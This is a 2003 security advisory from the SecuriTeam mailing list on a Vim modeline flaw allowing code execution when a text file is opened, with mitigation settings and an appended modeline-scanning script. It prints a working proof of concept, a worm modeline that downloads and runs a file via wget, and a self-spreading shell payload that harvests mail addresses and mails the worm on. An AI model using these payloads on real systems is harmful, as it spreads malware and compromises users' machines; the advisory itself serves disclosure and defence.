[UNIX] The First VIM Worm

From: support@securiteam.com
Date: 01/21/03

    From: support@securiteam.com
    To: list@securiteam.com
    Date: 21 Jan 2003 16:38:42 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Beyond Security would like to welcome Tiscali World Online
    to our service provider team.
    For more info on their service offering IP-Secure,
    please visit http://www.worldonline.co.za/services/work_ip.asp
    - - - - - - - - -

      The First VIM Worm
    ------------------------------------------------------------------------

    SUMMARY

    A vulnerability in VIM, found by Georgi Guninski, allows a remote attacker
    to execute arbitrary code whenever an unsuspecting user opens a text file.
    This vulnerability can be further extended into a worm, as illustrated
    below.

    DETAILS

    Protection:
    Put the following in your ~/.vimrc or better in a system wide config file:
    set modelines=0

    It disables modelines without breaking significant functionality - there
    is no compatibility in this stuff between vim and emacs anyway.

    Even when/if vim is fixed, Georgi Guninski strongly recommends keeping this
    setting to prevent similar exploits in the future.

    Emacs addicts are recommended to disable local variables, which may pose a
    similar threat, by putting the following in ~/.emacs:
    ;; disable local variables
    (setq enable-local-variables nil)

    How it works:
    There is a little bug in vi, which allows command execution.

    The following two lines execute the ls command on the target host if the
    file is opened with vim. (Try it out with "vi viexpl.txt".)

    (In all of the examples below, the letter i of vim has been replaced with
    an !)

    /* v!m:set foldmethod=expr: */
    /* v!m:set
    foldexpr=confirm(libcall("/lib/libc.so.6","system","ls"),"ms_sux"): */

    The output is:
    -- START OF OUTPUT --
    "viexpl.txt" 2L, 113CREADME TODO commands.sh commands.sh.long
    mail.txt proof.txt test.txt viexpl.txt viworm.txt worm.sh

    ms_sux:
    -- END OF OUTPUT --

    The worm uses this bug to download a file to the /tmp directory.

    -- START OF VIWORM FILE --
    /* v!m:set foldmethod=expr: */
    /* v!m:set foldexpr=confirm(libcall("/lib/libc.so.6","system","cd\
    /tmp;wget\ 127.0.0.1/joni8172ff3g;chmod\ 0755\
    /tmp/joni8172ff3g;/tmp/joni8172ff3g"),"ms_sux"): */
    -- END OF VIWORM FILE --

    The above file does the following:
     * Change to /tmp
     * Download the file joni8172ff3g to /tmp with wget from 127.0.0.1 (change
    the IP to your web server; 127.0.0.1 is localhost)
     * Make it executable with chmod 0755
     * Execute the file

    Here is the code of the downloaded file:
    -- START OF FILE --
    echo 'JuliaBabe1234@gmx.net'>>/var/spool/mail/$USER;echo
    'CharlesBob1234@gmx.net'>>~/mbox;cat ~/mbox /var/spool/mail/*|grep '@'|cut
    -d ' ' -f 2|grep '@'|grep -v '<'|grep -v '"'|grep -v ','|sort|uniq >
    /tmp/h0oVeR183257;for i in `cat /tmp/h0oVeR183257`;do echo -e
    "/usr/sbin/sendmail $i <<EOFF\nSubject: Hi\nContent-Type: text/plain;
    charset=us-ascii\nContent-Disposition: attachment;
    filename=\"concept.txt\"\n\n/* v!m:set foldmethod=expr: */\n/* v!m:set
    foldexpr=confirm(libcall(\"/lib/libc.so.6\",\"system\",\"cd\ /tmp;wget\
    127.0.0.1/joni8172ff3g;chmod\ 0755\
    /tmp/joni8172ff3g;/tmp/joni8172ff3g\"),\"ms_sux\"):
    */\n\nEOFF">/tmp/f33lOe18352;. /tmp/f33lOe18352 2> /dev/null;done
    -- END OF FILE --

     * Write a fake address to /var/spool/mail/$USER (creating the file if it
    does not exist).
     * Write a fake address to ~/mbox (creating the file if it does not exist).
     * Extract mail addresses from ~/mbox and /var/spool/mail/* with grep and
    grep -v.
     * Sort the result and make it unique (only one entry per address).
     * Send a mail with sendmail to every address, with the subject "Hi" and the
    viworm file attached as concept.txt.
     * Execute all of it and send stderr to /dev/null.

    If other users open the mail with the vi editor, the worm file is
    downloaded and executed.
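    As an added example (not part of this advisory or of Georgi Guninski's code), the following scanner finds the modelines Vim would actually honour in a file such as the mailed concept.txt and flags the ones that set expression-valued options or call out through libcall/system, the mechanism used by both the ls proof of concept and the worm above. The list of expression options is an assumption, and the sample file is constructed from the proof of concept.

```python
import re

# Vim only honours modelines in the first and last 'modelines' lines (default 5).
MODELINES = 5

# Both modeline forms Vim accepts; in the "set" form the options run up to the
# first unescaped ':' (a backslash escapes a colon).
MODELINE_RE = re.compile(
    r'(?:^|\s)(?:vi|vim|Vi|ex):\s*(?:(?:se|set)\s+((?:[^:\\]|\\.)*):|(.*))')

# Options whose value Vim evaluates as an expression (assumed, not exhaustive).
EXPR_OPTIONS = ('foldexpr', 'fde', 'formatexpr', 'fex', 'indentexpr', 'inde',
                'includeexpr', 'inex', 'foldtext', 'fdt', 'statusline', 'stl',
                'printexpr', 'pexpr', 'diffexpr', 'dex', 'patchexpr', 'pex')
EXPR_OPTION_RE = re.compile(r'(?:^|\s)(?:%s)=' % '|'.join(EXPR_OPTIONS))
# Calls the advisory's proof of concept relies on; none belongs in a modeline.
DANGEROUS_CALLS = ('libcall(', 'system(', 'execute(', 'writefile(')

def find_modelines(text, modelines=MODELINES):
    """Return (line_number, options) for each modeline Vim would act on."""
    lines = text.splitlines()
    n = len(lines)
    candidates = set(range(min(modelines, n))) | set(range(max(0, n - modelines), n))
    found = []
    for i in sorted(candidates):
        m = MODELINE_RE.search(lines[i])
        if m:
            opts = m.group(1) if m.group(1) is not None else m.group(2)
            found.append((i + 1, opts.replace('\\:', ':').strip()))
    return found

def classify(options):
    """'dangerous': calls out of Vim; 'suspicious': sets an expression option."""
    if any(call in options for call in DANGEROUS_CALLS):
        return 'dangerous'
    if EXPR_OPTION_RE.search(options):
        return 'suspicious'
    return 'benign'

def scan(text):
    """Scan one file's contents; returns [(line, verdict, options), ...]."""
    return [(ln, classify(opts), opts) for ln, opts in find_modelines(text)]

# Constructed sample: the advisory's proof of concept (with its harmless "ls")
# beside an ordinary indentation modeline.
SAMPLE = """/* vim:set foldmethod=expr: */
/* vim:set foldexpr=confirm(libcall("/lib/libc.so.6","system","ls"),"ms_sux"): */
# vim: ts=4 sw=4 et
"""
```

    Run over a mail attachment or a whole maildir, a 'dangerous' verdict is the trigger to quarantine the message; a 'suspicious' one deserves a look, since no indentation modeline needs an expression option.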

    ADDITIONAL INFORMATION

    Georgi Guninski's advisory can be found at:
     http://www.guninski.com/vim1.html

    The information has been provided by Nostradamus and Georgi Guninski.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.